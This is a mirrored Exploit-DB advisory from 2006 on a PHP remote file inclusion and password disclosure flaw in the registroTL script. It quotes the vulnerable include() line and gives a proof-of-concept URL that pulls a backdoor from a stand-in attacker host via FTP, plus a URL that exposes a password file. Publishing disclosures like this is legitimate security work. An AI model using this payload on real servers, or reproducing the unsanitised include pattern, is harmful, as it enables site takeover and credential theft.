- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2502
- Проверка EDB
-
- Пройдено
- Автор
- DARKFIG
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5316 cve-2006-5315
- Дата публикации
- 2006-10-10
Код:
#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
# Affected.scr: registroTL
# Download....: http://www.phplibre.com.es/downloads/registroTL.zip
# Poc.........: http://victim.com/main.php?page=ftp://hack.com/backdrphpext
# http://victim.com/usuarios.dat <- Passwords disclosure
# Vuln.code...: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))
# include($_GET['page'].".php");
# milw0rm.com [2006-10-10]
- Источник
- www.exploit-db.com